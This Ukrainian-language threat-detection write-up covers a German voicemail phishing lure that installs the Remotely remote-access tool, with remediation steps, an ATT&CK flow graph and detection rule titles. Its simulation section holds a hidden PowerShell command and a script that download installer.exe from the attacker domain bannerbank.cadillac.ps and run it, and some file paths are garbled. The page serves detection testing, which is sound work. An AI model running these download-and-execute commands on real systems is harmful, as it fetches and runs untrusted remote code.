Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники розміщують веб-сторінки «голосової пошти» німецькою мовою, які спонукають користувачів завантажити BAT-файл. Сценарій відтворює нешкідливу аудіо-приманку, одночасно тихо встановлюючи легітимний інструмент віддаленого моніторингу Remotely. Після розгортання агент RMM надає зловмиснику стійкий віддалений доступ через інфраструктуру C2, контрольовану зловмисником.
Розслідування
Censys ідентифікував 86 скомпрометованих веб-ресурсів на доменах *.cadillac.ps, які поширюють шкідливий BAT. Сценарій викликає інсталятор PowerShell, розміщений на remotely.billbutterworth.com, який завантажує ZIP-пакет Remotely. Архів містить компоненти агента Remotely та сервіс, що встановлюється у C:Program FilesRemotely.
Усунення
Заблокуйте домени *.cadillac.ps і remotely.billbutterworth.com на рівні DNS/проксі. Навчайте користувачів не запускати неочікувані BAT-файли або не копіювати/вставляти команди PowerShell з невідомих веб-сторінок. Впровадьте контролі на кінцевих точках для виявлення створення сервісу Remotely, підозрілих шляхів встановлення або не підписаних інструментів.
Реагування
Оповістіть про створення Remotely_Service і присутність Remotely_Agent.exe в Program Files. Відстежуйте діяльність voicemail.bat та пов’язаний із ним інсталятор PowerShell. Ізолюйте заражені хости, зберіть артефакти судової експертизи та змініть/відкличте будь-які облікові дані або токени, використані агентом RMM.
graph TB %% Визначення класів classDef action fill:#99ccff %% Вузли node_content_injection[“<b>Техніка</b> – T1659 Інʼєкція Контенту<br/>Скомпрометований веб-ресурс доставляє шкідливе посилання.”] class node_content_injection action node_initial_user_exec[“<b>Техніка</b> – T1204.001 Виконання Користувачем: Шкідливе Посилання<br/>Жертва переходить за шкідливим посиланням на скомпрометовану сторінку голосової пошти.”] class node_initial_user_exec action node_cmd_shell[“<b>Техніка</b> – T1059.003 Командна Оболонка Windows<br/>BAT-файл (voicemail.bat) завантажено та виконано.”] class node_cmd_shell action node_powershell[“<b>Техніка</b> – T1059.001 PowerShell<br/>Скрипт Install-Remotely.ps1 встановлює Remotely RMM.”] class node_powershell action node_system_service[“<b>Техніка</b> – T1569 Системні Служби<br/>RMM встановлено як службу Windows (Remotely_Service).”] class node_system_service action node_masquerading[“<b>Техніка</b> – T1036 Маскування & T1036.008 Маскування Типу Файлу<br/>BAT подано як медіа-оновлення; файли розміщені в Program Files.”] class node_masquerading action node_hide_artifacts[“<b>Техніка</b> – T1564 Приховування Артефактів<br/>Артефакти інсталяції приховані в C:\Program Files\Remotely.”] class node_hide_artifacts action node_c2[“<b>Техніка</b> – T1102.002 Двосторонній Звʼязок через Веб-Сервіс & T1071 Протокол Прикладного Рівня<br/>HTTPS-звʼязок із віддаленим сервером.”] class node_c2 action %% Зʼєднання node_content_injection –>|підтримує| node_initial_user_exec node_initial_user_exec –>|призводить_до| node_cmd_shell node_cmd_shell –>|виконує| node_powershell node_powershell –>|встановлює| node_system_service node_system_service –>|використовує| node_masquerading node_system_service –>|використовує| node_hide_artifacts node_system_service –>|встановлює| node_c2
Потік Атаки
Виявлення
Завантаження чи Завантаження через Powershell (через командний рядок)
Перегляд
Підозріле зупинення сервісу, яке перешкоджає дії зловмисного програмного забезпечення (через командний рядок)
Перегляд
PowerShell виконує файл у підозрілій папці з використанням політики обходу виконання (через командний рядок)
Перегляд
Індикатори компрометації (HashSha256) для виявлення: Пастка голосової пошти: Німецькомовна приманка голосової пошти призводить до віддаленого доступу
Перегляд
Індикатори компрометації (HashMd5) для виявлення: Пастка голосової пошти: Німецькомовна приманка голосової пошти призводить до віддаленого доступу
Перегляд
Німецька приманка голосової пошти, що веде до встановлення RMM [Веб-сервер]
Перегляд
Виявлення виконання файлу голосової пошти BAT [Подія файлу Windows]
Перегляд
Імітаційне виконання
Передумова: Попередня перевірка телеметрії та основи повинна була пройти.
Обґрунтування: Цей розділ детально описує точне виконання техніки нападника (TTP), розробленої для запуску правила виявлення. Команди та розповідь МАЮТЬ безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, очікувану логікою виявлення. Або абстрактні приклади, або не пов’язані приклади призведуть до хибних діагнозів.
-
Розповідь про атаку та команди:
- Доставка фішингу: Атакуючий надсилає електронний лист із вкладенням-приманкою голосової пошти (HTML) німецькою мовою, яке при відкритті перенаправляє жертву на
http://bannerbank.cadillac.ps/voicemail.html. - Виконання на посадковій сторінці: На посадковій сторінці розміщено шкідливий однорядковий PowerShell, який завантажує та виконує інсталятор інструмента віддаленого управління (RMM).
- Створення процесів: Коли браузер жертви обробляє сторінку, PowerShell викликається з командним рядком, який явно включає два рядки, на які дивиться правило.
- Результуюча телеметрія: Windows реєструє подію ID 4688 з
CommandLineщо містить обидва «посадкова сторінка з голосовою поштою» and «bannerbank.cadillac.ps», таким чином, задовольняючи умовам Sigma.
Точна команда, використана для імітації:
# Імітоване шкідливе виконання – містить обидва тригерних рядки Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'посадкова сторінка з голосовою поштою'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`" - Доставка фішингу: Атакуючий надсилає електронний лист із вкладенням-приманкою голосової пошти (HTML) німецькою мовою, яке при відкритті перенаправляє жертву на
-
Скрипт регресійного тестування: Самодостатній PowerShell-скрипт, що відтворює атаку і може бути виконаний на будь-якому хості Windows з увімкненим необхідним логуванням.
<# .SYNOPSIS Імітує німецькомовну приманку голосової пошти, яка запускає правило виявлення Sigma. .DESCRIPTION Виконує командний рядок PowerShell, що містить обидва необхідні підрядки. #> # Define malicious strings $lureText = "посадкова сторінка з голосовою поштою" $maliciousDomain = "bannerbank.cadillac.ps" # Побудуйте однорядковий рядок, який з'явиться в командному рядку $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Запустіть PowerShell з підготовленим командним рядком $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Запуск шкідливої команди PowerShell..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: wait a few seconds to ensure logging Start-Sleep -Seconds 5 -
Команди очищення: Видаліть завантажені інсталятори та будь-які залишкові процеси.
# Зупиніть будь-який залишковий процес інсталятора Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Видаліть тимчасовий файл інсталятора $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Очищено $installerPath" }